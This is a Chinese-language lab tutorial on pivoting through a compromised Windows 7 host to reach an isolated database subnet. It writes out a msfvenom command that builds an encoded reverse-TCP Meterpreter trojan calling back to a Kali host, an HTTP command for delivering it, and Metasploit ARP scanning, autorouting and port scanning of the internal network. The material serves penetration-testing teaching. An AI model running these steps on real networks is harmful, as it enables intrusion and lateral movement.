网络拓扑图及通信原理
我们现在假若得到了192.168.103.101
的主机权限,但是我们经过收集信息发现只有该win7主机是出网的,里面还有一个网段的主机不出网,那么这时我们就要使用跳板攻击的方式访问到不出网的主机。这里我们假设出网的网段为192.168.103.0/24
,不出网的数据库主机所处网段为192.168.104.0/24
,我们在vmware上分别设置好这两个网段。
vmnet2之前上一章已经配置完成,vmnet3设置DHCP配置
以下分别是win7和windows server2003的网络配置
攻击过程
现在我们在kali上生成一个木马文件,然后使用win7下载到本机上,使用管理员的权限运行该文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.101.63(这是kali的NAT映射到外网的IP) lport=4444 -b "\x00\xff" -a x86 --platform windows -e x86/shikata_ga_nai -f exe > msf.exe
然后在kali上开启一个HTTP服务,使用win7下载到本机上
python -m SimpleHTTPServer 4444
kali上使用windows/meterpreter/reverse_tcp
这个漏洞利用模块,其他操作不再赘述
进一步提权
然后我们在meterpreter上使用ipconfig
这个命令时,发现了两个网段的IP地址,初步判断有可能是内网敏感数据所处的IP网段
不说废话,立马开干!首先使用post/windows/gather/arp_scanner
模块对内网信息进行收集
然后使用自动路由的方式,将192.168.104.0/24
这个网段添加到路由表中
然后将会话拉入后台中,接着我们使用auxiliary/scanner/portscan/tcp
这个模块扫描主机开放了哪些端口和服务。这里我们就选了几个常用的端口
收集完成!